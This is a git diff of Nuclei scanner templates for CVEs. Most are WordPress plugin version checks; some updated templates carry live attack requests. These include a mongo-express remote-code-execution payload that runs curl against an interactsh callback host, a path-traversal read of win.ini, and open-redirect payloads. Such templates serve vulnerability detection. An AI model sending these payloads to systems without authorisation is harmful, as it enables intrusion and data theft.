"{{BaseURL}}/wp-content/plugins/buddyforms/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "buddyforms" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.8.11') \ No newline at end of file diff --git a/poc/cve/CVE-2024-8271.yaml b/poc/cve/CVE-2024-8271.yaml new file mode 100644 index 0000000000..3148da9093 --- /dev/null +++ b/poc/cve/CVE-2024-8271.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-8271 + +info: + name: > + FOX – Currency Switcher Professional for WooCommerce <= 1.4.2.1 - Unauthenticated Arbitrary Shortcode Execution + author: topscoder + severity: high + description: > + The The FOX – Currency Switcher Professional for WooCommerce plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 1.4.2.1. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode in the 'woocs_get_custom_price_html' function. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/dec51bd6-2ffe-47b6-9423-6131395bf439?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L + cvss-score: 7.3 + cve-id: CVE-2024-8271 + metadata: + fofa-query: "wp-content/plugins/woocommerce-currency-switcher/" + google-query: inurl:"/wp-content/plugins/woocommerce-currency-switcher/" + shodan-query: 'vuln:CVE-2024-8271' + tags: cve,wordpress,wp-plugin,woocommerce-currency-switcher,high + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/woocommerce-currency-switcher/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "woocommerce-currency-switcher" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.4.2.1') \ No newline at end of file diff --git a/poc/cve/CVE-2024-8479.yaml b/poc/cve/CVE-2024-8479.yaml new file mode 100644 index 0000000000..0001735ba3 --- /dev/null +++ b/poc/cve/CVE-2024-8479.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-8479 + +info: + name: > + Simple Spoiler 1.2 - 1.3 - Unauthenticated Arbitrary Shortcode Execution + author: topscoder + severity: high + description: > + The The Simple Spoiler plugin for WordPress is vulnerable to arbitrary shortcode execution in versions 1.2 to 1.3. This is due to the plugin adding the filter add_filter('comment_text', 'do_shortcode'); which will run all shortcodes in comments. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/8ffc76d8-b841-4c26-bbc6-1f96664efe36?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L + cvss-score: 7.3 + cve-id: CVE-2024-8479 + metadata: + fofa-query: "wp-content/plugins/simple-spoiler/" + google-query: inurl:"/wp-content/plugins/simple-spoiler/" + shodan-query: 'vuln:CVE-2024-8479' + tags: cve,wordpress,wp-plugin,simple-spoiler,high + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/simple-spoiler/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "simple-spoiler" + part: body + + - type: dsl + dsl: + - compare_versions(version, '>= 1.2', '<= 1.3') \ No newline at end of file diff --git a/poc/cve/CVE-2024-8669.yaml b/poc/cve/CVE-2024-8669.yaml new file mode 100644 index 0000000000..567d63a88b --- /dev/null +++ b/poc/cve/CVE-2024-8669.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-8669 + +info: + name: > + Backuply – Backup, Restore, Migrate and Clone <= 1.3.4 - Authenticated (Admin+) SQL Injection + author: topscoder + severity: low + description: > + The Backuply – Backup, Restore, Migrate and Clone plugin for WordPress is vulnerable to SQL Injection via the 'options' parameter passed to the backuply_wp_clone_sql() function in all versions up to, and including, 1.3.4 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with administrator-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/6a061553-c988-4a31-a0a2-7a2608faa33f?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H + cvss-score: 9.1 + cve-id: CVE-2024-8669 + metadata: + fofa-query: "wp-content/plugins/backuply/" + google-query: inurl:"/wp-content/plugins/backuply/" + shodan-query: 'vuln:CVE-2024-8669' + tags: cve,wordpress,wp-plugin,backuply,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/backuply/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "backuply" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.3.4') \ No newline at end of file diff --git a/poc/cve/CVE-2024-8724.yaml b/poc/cve/CVE-2024-8724.yaml new file mode 100644 index 0000000000..f0d4cf631a --- /dev/null +++ b/poc/cve/CVE-2024-8724.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-8724 + +info: + name: > + Waitlist Woocommerce ( Back in stock notifier ) <= 2.7.5 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + The Waitlist Woocommerce ( Back in stock notifier ) plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 2.7.5. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/c298c87e-cf3c-4b72-bb0e-a01ca2dfe52f?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-8724 + metadata: + fofa-query: "wp-content/plugins/waitlist-woocommerce/" + google-query: inurl:"/wp-content/plugins/waitlist-woocommerce/" + shodan-query: 'vuln:CVE-2024-8724' + tags: cve,wordpress,wp-plugin,waitlist-woocommerce,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/waitlist-woocommerce/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "waitlist-woocommerce" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.7.5') \ No newline at end of file diff --git a/poc/cve/CVE-2024-8797.yaml b/poc/cve/CVE-2024-8797.yaml new file mode 100644 index 0000000000..f0288d9034 --- /dev/null +++ b/poc/cve/CVE-2024-8797.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-8797 + +info: + name: > + WP Booking System – Booking Calendar <= 2.0.19.8 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + The WP Booking System – Booking Calendar plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg & remove_query_arg without appropriate escaping on the URL in all versions up to, and including, 2.0.19.8. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/1bea55b5-b2d7-4eaf-8868-d2645ce18619?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-8797 + metadata: + fofa-query: "wp-content/plugins/wp-booking-system/" + google-query: inurl:"/wp-content/plugins/wp-booking-system/" + shodan-query: 'vuln:CVE-2024-8797' + tags: cve,wordpress,wp-plugin,wp-booking-system,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-booking-system/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-booking-system" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.0.19.8') \ No newline at end of file diff --git a/poc/cve/cve-2017-11512.yaml b/poc/cve/cve-2017-11512.yaml index 095801ddf9..8b2924e2e0 100644 --- a/poc/cve/cve-2017-11512.yaml +++ b/poc/cve/cve-2017-11512.yaml @@ -6,22 +6,33 @@ info: severity: high description: | ManageEngine ServiceDesk 9.3.9328 is vulnerable to an arbitrary file retrieval due to improper restrictions of the pathname used in the name parameter for the download-snapshot path. An unauthenticated remote attacker can use this vulnerability to download arbitrary files. + impact: | + An attacker can access sensitive files on the server, potentially leading to unauthorized access or data leakage. + remediation: | + Upgrade to a patched version of ManageEngine ServiceDesk 9.3.9328 or apply the necessary security patches. reference: - https://exploit.kitploit.com/2017/11/manageengine-servicedesk-cve-2017-11512.html - https://www.tenable.com/security/research/tra-2017-31 - - https://web.archive.org/web/20210116180015/https://www.securityfocus.com/bid/101789/ - https://nvd.nist.gov/vuln/detail/CVE-2017-11512 + - https://github.com/ARPSyndicate/kenzer-templates + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2017-11512 cwe-id: CWE-22 + epss-score: 0.97175 + epss-percentile: 0.99794 + cpe: cpe:2.3:a:manageengine:servicedesk:9.3.9328:*:*:*:*:*:*:* metadata: + verified: true + max-request: 2 + vendor: manageengine + product: servicedesk shodan-query: http.title:"ManageEngine" - verified: "true" tags: cve,cve2017,manageengine,lfr,unauth,tenable -requests: +http: - method: GET path: - '{{BaseURL}}/fosagent/repl/download-file?basedir=4&filepath=..\..\Windows\win.ini' @@ -36,5 +47,4 @@ requests: - "fonts" - "extensions" condition: and - -# Enhanced by mp on 2022/06/09 +# digest: 4a0a00473045022075475b13b0c988c21ece3fd5009fa0ed01ba7fef5c7daffb6579403d0bfdc831022100809a276461fd74d794533eaf19a7d5155c61d32b746d12ac53a958ef2f4dbaf6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/cve-2018-1000671.yaml b/poc/cve/cve-2018-1000671.yaml index d6302807a8..009d5c0c00 100644 --- a/poc/cve/cve-2018-1000671.yaml +++ b/poc/cve/cve-2018-1000671.yaml @@ -5,21 +5,33 @@ info: author: 0x_Akoko severity: medium description: Sympa version 6.2.16 and later contains a URL Redirection to Untrusted Site vulnerability in the referer parameter of the wwsympa fcgi login action that can result in open redirection and reflected cross-site scripting via data URIs. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential session hijacking, defacement, or theft of sensitive information. + remediation: | + Upgrade to a patched version of Sympa (>=6.2.17) or apply the necessary security patches provided by the vendor. reference: - https://github.com/sympa-community/sympa/issues/268 - https://vuldb.com/?id.123670 - https://nvd.nist.gov/vuln/detail/CVE-2018-1000671 + - https://lists.debian.org/debian-lts-announce/2018/09/msg00023.html + - https://lists.debian.org/debian-lts-announce/2020/11/msg00015.html classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2018-1000671 cwe-id: CWE-601 + epss-score: 0.00598 + epss-percentile: 0.77958 + cpe: cpe:2.3:a:sympa:sympa:*:*:*:*:*:*:*:* metadata: + verified: true + max-request: 1 + vendor: sympa + product: sympa shodan-query: http.html:"sympa" - verified: "true" tags: cve,cve2018,redirect,sympa,debian -requests: +http: - method: GET path: - '{{BaseURL}}/sympa?referer=http://interact.sh&passwd=&previous_action=&action=login&action_login=&previous_list=&list=&email=' @@ -28,6 +40,5 @@ requests: - type: regex part: header regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 - -# Enhanced by mp on 2022/08/18 + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 +# digest: 4a0a0047304502204e16f5d026a87fbad38aac592766dd6e68435602edbec28fe2e6270fafc0d437022100b08c758a888bb461050d16dce5bf53016a9a5c643a58e4b347f17111f5cb0bf2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/cve-2018-12300.yaml b/poc/cve/cve-2018-12300.yaml index aac189bfd8..94384ca163 100644 --- a/poc/cve/cve-2018-12300.yaml +++ b/poc/cve/cve-2018-12300.yaml @@ -1,28 +1,39 @@ id: CVE-2018-12300 info: - name: Seagate NAS OS 4.3.15.1 - Open redirect + name: Seagate NAS OS 4.3.15.1 - Open Redirect author: 0x_Akoko severity: medium - description: Arbitrary Redirect in echo-server.html in Seagate NAS OS version 4.3.15.1 allows attackers to disclose information in the Referer header via the 'state' URL parameter. + description: Seagate NAS OS 4.3.15.1 contains an open redirect vulnerability in echo-server.html, which can allow an attacker to disclose information in the referer header via the state URL parameter. + impact: | + Successful exploitation of this vulnerability could lead to user redirection to malicious websites, potentially resulting in the theft of sensitive information or the installation of malware. + remediation: | + Apply the latest security patches or updates provided by Seagate to fix the open redirect vulnerability in NAS OS 4.3.15.1. reference: - https://blog.securityevaluators.com/invading-your-personal-cloud-ise-labs-exploits-the-seagate-stcr3000101-ecf89de2170 - - https://www.cvedetails.com/cve/CVE-2018-12300 + - https://nvd.nist.gov/vuln/detail/CVE-2018-12300 classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 cve-id: CVE-2018-12300 cwe-id: CWE-601 - tags: cve,cve2018,redirect,seagate,nasos + epss-score: 0.00118 + epss-percentile: 0.45685 + cpe: cpe:2.3:o:seagate:nas_os:4.3.15.1:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: seagate + product: nas_os + tags: cve2018,cve,redirect,seagate,nasos -requests: +http: - method: GET - path: - - '{{BaseURL}}/echo-server.html?code=test&state=http://www.attacker.com#' + - '{{BaseURL}}/echo-server.html?code=test&state=http://www.interact.sh#' matchers: - type: regex part: header regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)attacker\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 +# digest: 4a0a00473045022100b3dfe85d30990abdfc76926f79fc0972052a3bf24374013a6ed622a5fac500f402202ad50a628af7526e0eca73ed3a88133d9c9e4962c830fcc5b7e868563bedb40e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/cve-2018-12675.yaml b/poc/cve/cve-2018-12675.yaml index d1f5d24b6f..52e4353249 100644 --- a/poc/cve/cve-2018-12675.yaml +++ b/poc/cve/cve-2018-12675.yaml @@ -6,21 +6,32 @@ info: severity: medium description: | SV3C HD Camera L Series 2.3.4.2103-S50-NTD-B20170508B and 2.3.4.2103-S50-NTD-B20170823B contains an open redirect vulnerability. It does not perform origin checks on URLs in the camera's web interface, which can be leveraged to send a user to an unexpected endpoint. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + An attacker can use this vulnerability to redirect users to malicious websites, leading to phishing attacks. + remediation: | + Apply the latest firmware update provided by the vendor to fix the open redirect vulnerability. reference: - https://bishopfox.com/blog/sv3c-l-series-hd-camera-advisory - https://vuldb.com/?id.125799 - https://www.bishopfox.com/news/2018/10/sv3c-l-series-hd-camera-multiple-vulnerabilities/ - https://nvd.nist.gov/vuln/detail/CVE-2018-12675 + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2018-12675 cwe-id: CWE-601 + epss-score: 0.00118 + epss-percentile: 0.44971 + cpe: cpe:2.3:o:sv3c:h.264_poe_ip_camera_firmware:v2.3.4.2103-s50-ntd-b20170508b:*:*:*:*:*:*:* metadata: - verified: "true" + verified: true + max-request: 1 + vendor: sv3c + product: h.264_poe_ip_camera_firmware tags: cve,cve2018,redirect,sv3c,camera,iot -requests: +http: - method: GET path: - '{{BaseURL}}/web/cgi-bin/hi3510/param.cgi?cmd=setmobilesnapattr&cururl=http%3A%2F%2Finteract.sh' @@ -30,5 +41,4 @@ requests: part: body words: - '' - -# Enhanced by md on 2022/10/13 +# digest: 4a0a00473045022100fe1e9de738122538a2449b660acfbadd5b2f6e95f978b4fd052467bb4f222c1b022077728b007829328b0aa238c9635a5106d04c04ef695ec1557e91b4b5b46cb70f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/cve-2018-9161.yaml b/poc/cve/cve-2018-9161.yaml index 5db121e528..d3295f40cc 100644 --- a/poc/cve/cve-2018-9161.yaml +++ b/poc/cve/cve-2018-9161.yaml @@ -4,18 +4,31 @@ info: name: PrismaWEB - Credentials Disclosure author: gy741 severity: critical - description: The vulnerability exists due to the disclosure of hard-coded credentials allowing an attacker to effectively bypass authentication of PrismaWEB with administrator privileges. The credentials can be disclosed by simply navigating to the login_par.js JavaScript page that holds the username and password for the management interface that are being used via the Login() function in /scripts/functions_cookie.js script. + description: PrismaWEB is susceptible to credential disclosure. The vulnerability exists due to the disclosure of hard-coded credentials allowing an attacker to effectively bypass authentication of PrismaWEB with administrator privileges. The credentials can be disclosed by simply navigating to the login_par.js JavaScript page that holds the username and password for the management interface that are being used via the Login() function in /scripts/functions_cookie.js script. + impact: | + An attacker could gain unauthorized access to the application and potentially compromise user accounts and sensitive data. + remediation: | + Ensure that sensitive credentials are properly protected and not exposed in the application's source code or configuration files. reference: - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5453.php - https://nvd.nist.gov/vuln/detail/CVE-2018-9161 - tags: cve,cve2018,prismaweb,exposure + - https://www.exploit-db.com/exploits/44276/ + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 + cvss-score: 9.8 cve-id: CVE-2018-9161 cwe-id: CWE-798 + epss-score: 0.12574 + epss-percentile: 0.95318 + cpe: cpe:2.3:a:prismaindustriale:checkweigher_prismaweb:1.21:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: prismaindustriale + product: checkweigher_prismaweb + tags: cve2018,cve,prismaweb,exposure,edb,prismaindustriale -requests: +http: - method: GET path: - "{{BaseURL}}/user/scripts/login_par.js" @@ -32,3 +45,4 @@ requests: - type: status status: - 200 +# digest: 4a0a00473045022100ffcd63af862f8b9aa24f999ad152b190ff12a716891947bdfcdf6f8928420413022006b1c871ad6ce93fb773c74b29e916effe0a6cb129653f58c5c4eb406cccfe6b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/cve-2019-10758.yaml b/poc/cve/cve-2019-10758.yaml index 9ce3a78eca..92d6c6e83f 100644 --- a/poc/cve/cve-2019-10758.yaml +++ b/poc/cve/cve-2019-10758.yaml @@ -4,20 +4,32 @@ info: name: mongo-express Remote Code Execution author: princechaddha severity: critical - description: "mongo-express before 0.54.0 is vulnerable to remote code execution via endpoints that uses the `toBSON` method and misuse the `vm` dependency to perform `exec` commands in a non-safe environment." + description: mongo-express before 0.54.0 is vulnerable to remote code execution via endpoints that uses the `toBSON` method and misuse the `vm` dependency to perform `exec` commands in a non-safe environment. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. + remediation: Upgrade mongo-express to version 0.54.0 or higher. reference: - https://github.com/vulhub/vulhub/tree/master/mongo-express/CVE-2019-10758 - https://nvd.nist.gov/vuln/detail/CVE-2019-10758 - remediation: Upgrade mongo-express to version 0.54.0 or higher. - metadata: - shodan-query: http.title:"Mongo Express" + - https://snyk.io/vuln/SNYK-JS-MONGOEXPRESS-473215 + - https://github.com/CLincat/vulcat + - https://github.com/MelanyRoob/Goby classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H - cvss-score: 9.90 + cvss-score: 9.9 cve-id: CVE-2019-10758 - tags: cve,cve2019,mongo,mongo-express + epss-score: 0.97429 + epss-percentile: 0.99934 + cpe: cpe:2.3:a:mongo-express_project:mongo-express:*:*:*:*:*:node.js:*:* + metadata: + max-request: 1 + vendor: mongo-express_project + product: mongo-express + framework: node.js + shodan-query: http.title:"Mongo Express" + tags: cve,cve2019,vulhub,mongo,mongo-express,kev,mongo-express_project,node.js -requests: +http: - raw: - | POST /checkValid HTTP/1.1 @@ -25,11 +37,11 @@ requests: Authorization: Basic YWRtaW46cGFzcw== Content-Type: application/x-www-form-urlencoded - document=this.constructor.constructor("return process")().mainModule.require("child_process").execSync("curl http://{{interactsh-url}}") + document=this.constructor.constructor("return process")().mainModule.require("child_process").execSync("curl {{interactsh-url}}") + matchers: - type: word - part: interactsh_protocol # Confirms the HTTP Interaction + part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" - -# Enhanced by mp on 2022/03/29 +# digest: 4b0a004830460221008b43b36836d54fe57119d7fbc9c2c7bbf83a5c28c40a75eb6347457778a45bc6022100fe8bb104228123301a28b551a1badd14112e0aa18bce53387295571b79c7b827:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/cve-2020-36365.yaml b/poc/cve/cve-2020-36365.yaml index 771c887368..c3116b81e6 100644 --- a/poc/cve/cve-2020-36365.yaml +++ b/poc/cve/cve-2020-36365.yaml @@ -1,31 +1,43 @@ id: CVE-2020-36365 info: - name: Smartstore < 4.1.0 - Open redirect + name: Smartstore <4.1.0 - Open Redirect author: 0x_Akoko severity: medium - description: Smartstore (aka SmartStoreNET) before 4.1.0 allows CommonController.ClearCache, ClearDatabaseCache, RestartApplication, and ScheduleTaskController.Edit open redirect. + description: Smartstore (aka "SmartStoreNET") before 4.1.0 contains an open redirect vulnerability via CommonController.ClearCache, ClearDatabaseCache, RestartApplication, and ScheduleTaskController.Edit. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the theft of sensitive information. + remediation: | + Upgrade Smartstore to version 4.1.0 or later to fix the open redirect vulnerability. reference: - https://github.com/smartstore/SmartStoreNET/issues/2113 - - https://www.cvedetails.com/cve/CVE-2020-36365 - https://github.com/smartstore/SmartStoreNET + - https://nvd.nist.gov/vuln/detail/CVE-2020-36365 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-score: 6.1 cve-id: CVE-2020-36365 cwe-id: CWE-601 + epss-score: 0.00244 + epss-percentile: 0.62379 + cpe: cpe:2.3:a:smartstore:smartstorenet:*:*:*:*:*:*:*:* metadata: + max-request: 1 + vendor: smartstore + product: smartstorenet shodan-query: http.html:'content="Smartstore' - tags: cve,cve2020,redirect,smartstore + tags: cve2020,cve,redirect,smartstore -requests: +http: - method: GET - path: - - '{{BaseURL}}/backend/admin/common/clearcache?previousUrl=http://www.example.com' + - '{{BaseURL}}/backend/admin/common/clearcache?previousUrl=http://www.interact.sh' matchers: - type: regex part: header regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 +# digest: 4b0a004830460221009a56af69b3c21b9fa51cb0f1ce2fc157d3bdc58bb721e709177dc38621b0de1c022100d1822d3b7e4d326ee387d0080c3efa1014d7db6936cdb908a687e0412facc9a1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/cve-2021-21311.yaml b/poc/cve/cve-2021-21311.yaml index fc48ecd2fb..deec236dce 100644 --- a/poc/cve/cve-2021-21311.yaml +++ b/poc/cve/cve-2021-21311.yaml @@ -1,34 +1,69 @@ id: CVE-2021-21311 info: - name: Adminer SSRF Using Verbose Error Messages - author: Adam Crosser + name: Adminer <4.7.9 - Server-Side Request Forgery + author: Adam Crosser,pwnhxl severity: high - description: Adminer is an open-source database management in a single PHP file. In adminer from version 4.0.0 and before 4.7.9 there is a server-side request forgery vulnerability. Users of Adminer versions bundling all drivers (e.g. `adminer.php`) are affected. This is fixed in version 4.7.9. + description: Adminer before 4.7.9 is susceptible to server-side request forgery due to exposure of sensitive information in error messages. Users of Adminer versions bundling all drivers, e.g. adminer.php, are affected. An attacker can possibly obtain this information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could lead to unauthorized access to internal resources and potential data leakage. + remediation: Upgrade to version 4.7.9 or later. reference: - https://github.com/vrana/adminer/security/advisories/GHSA-x5r2-hj5c-8jx6 - https://github.com/vrana/adminer/files/5957311/Adminer.SSRF.pdf - metadata: - shodan-query: title:"Login - Adminer" - tags: cve,cve2021,adminer,ssrf + - https://packagist.org/packages/vrana/adminer + - https://nvd.nist.gov/vuln/detail/CVE-2021-21311 + - https://github.com/vrana/adminer/commit/ccd2374b0b12bd547417bf0dacdf153826c83351 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N - cvss-score: 7.20 + cvss-score: 7.2 cve-id: CVE-2021-21311 cwe-id: CWE-918 + epss-score: 0.01485 + epss-percentile: 0.85417 + cpe: cpe:2.3:a:adminer:adminer:*:*:*:*:*:*:*:* + metadata: + max-request: 6 + vendor: adminer + product: adminer + shodan-query: title:"Login - Adminer" + fofa-query: app="Adminer" && body="4.7.8" + hunter-query: app.name="Adminer"&&web.body="4.7.8" + tags: cve2021,cve,adminer,ssrf -requests: - - method: GET - path: - - "{{BaseURL}}/adminer?elastic=example.com&username=" +http: + - raw: + - | + POST {{path}} HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + auth[driver]=elastic&auth[server]=example.org&auth[username]={{to_lower(rand_base(8))}}&auth[password]={{to_lower(rand_base(8))}}&auth[db]={{to_lower(rand_base(8))}} + + payloads: + path: + - "/index.php" + - "/adminer.php" + - "/adminer/adminer.php" + - "/adminer/index.php" + - "/_adminer.php" + - "/_adminer/index.php" + + attack: batteringram + stop-at-first-match: true + redirects: true + max-redirects: 1 matchers-condition: and matchers: - - type: status - status: - - 403 - - type: word part: body words: + - "400 - Bad Request" - "<title>400 - Bad Request</title>" + condition: or + + - type: status + status: + - 403 +# digest: 4a0a0047304502204671bff084169fc348f8c4837b6a81b74f49e87909f1e780a61bd35749ea8a16022100b98866077226246c174b2cb21ee40adccb717dcf57821c10b00a84b00c03df16:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/cve-2021-25111.yaml b/poc/cve/cve-2021-25111.yaml index 42b2530141..01f582930c 100644 --- a/poc/cve/cve-2021-25111.yaml +++ b/poc/cve/cve-2021-25111.yaml @@ -5,17 +5,30 @@ info: author: akincibor severity: medium description: WordPress English Admin plugin before 1.5.2 contains an open redirect vulnerability. The plugin does not validate the admin_custom_language_return_url before redirecting users to it. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the execution of other malicious activities. + remediation: | + Update to the latest version of the WordPress English Admin plugin (1.5.2 or higher) to fix the open redirect vulnerability. reference: - 